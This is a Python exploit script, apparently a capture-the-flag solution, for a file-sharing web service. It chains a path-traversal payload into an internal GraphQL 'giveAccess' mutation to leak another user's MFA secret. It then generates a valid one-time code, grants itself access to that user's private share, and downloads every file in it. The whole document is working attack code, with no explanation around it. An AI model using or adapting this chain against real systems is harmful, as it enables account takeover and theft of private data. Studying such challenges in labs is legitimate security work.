import base64
import json
import pyotp
import requests

HOST = "fileshare.fr"
PORT = 31337

def create_url(path):
    return f"https://{HOST}{path}"

authinfo = {'username': 'wienpalddec', 'password': 'wienpalddec'}

# Register a new account
res = requests.post(create_url("/rest/auth/register"), data = authinfo)
if res.status_code != 200:
    print("Registration error")
    raise

# Login
authdata = {'username': 'wienpalddec', 'password': 'wienpalddec'}
res = requests.post(create_url("/rest/auth/login"), data = authinfo)
if res.status_code != 200:
    print("Authentication error")
    raise
authcookie = { 'Authorization': f'Bearer {json.loads(res.content)["access_token"]}'}

# Get secret share info
res = requests.get(
    create_url("/rest/shares/332dd074-60f4-4419-9f3c-28fd302acc86/files"),
    headers = authcookie)
if res.status_code != 200:
    print("Share info error")
    raise
fileinfos = json.loads(res.content)['share']['files']

# Get secret user info
url = """/rest/shares/{0}/files/test""" + \
"""$'..$'..$'..$'..$'""" + \
"""_dev$'gql%3f_method=POST&""" + \
"""query=mutation GreetingQuery {{
    giveAccess(
            id:"332dd074-60f4-4419-9f3c-28fd302acc86"
            otp:"BADOTP"
            username:"wienpalddec"
    ) {{
        success, owner {{
            ... on User {{username,mfa_secret}}
        }}
    }}
}}&operationName=GreetingQuery&"""
url = url.format(fileinfos[0]['id'])
url = url.replace("\n", "")
url = url.replace(" ", "%20")
res = requests.get(
    create_url(url),
    headers = authcookie)
if res.status_code != 200:
    print("Secret user info error")
    raise
jsondata   = json.loads(res.content)
secretuser = jsondata['data']['giveAccess']['owner']['username']
mfasecret  = jsondata['data']['giveAccess']['owner']['mfa_secret']
print(f'[+] Found secret user ("{secretuser}") MFA secret: \n\t-> {mfasecret}')

# Grant ourself access to the secret share
otp = pyotp.TOTP(mfasecret, name = secretuser, issuer = "FileShare")
otpstr = otp.now()
url = """/rest/shares/ef676bd0-d321-40ae-b7e5-f5a88dd2a77b/files/test""" + \
"""$'..$'..$'..$'..$'""" + \
"""_dev$'gql%3f_method=POST&""" + \
"""query=mutation GreetingQuery {{
    giveAccess(
            id:"332dd074-60f4-4419-9f3c-28fd302acc86"
            otp:"{0}"
            username:"{1}"
    ) {{
        success, owner {{
            ... on User {{username,mfa_secret}}
        }}
    }}
}}&operationName=GreetingQuery&"""
url = url.format(otpstr, 'wienpalddec')
url = url.replace("\n", "")
url = url.replace(" ", "%20")
res = requests.get(
    create_url(url),
    headers = authcookie)

for fileinfo in fileinfos:
    filename = fileinfo['name']
    res = requests.get(
        create_url(f'/rest/shares/332dd074-60f4-4419-9f3c-28fd302acc86/files/{filename}'),
        headers = authcookie)
    if res.status_code != 200:
        print(f'Error getting info for file {filename}')
    b64data = json.loads(res.content)['share']['file']['data']
    data = base64.b64decode(b64data)
    
    print(f'[+] Found dumping file {filename} to filesystem')
    with open(filename, "wb") as f:
        f.write(data)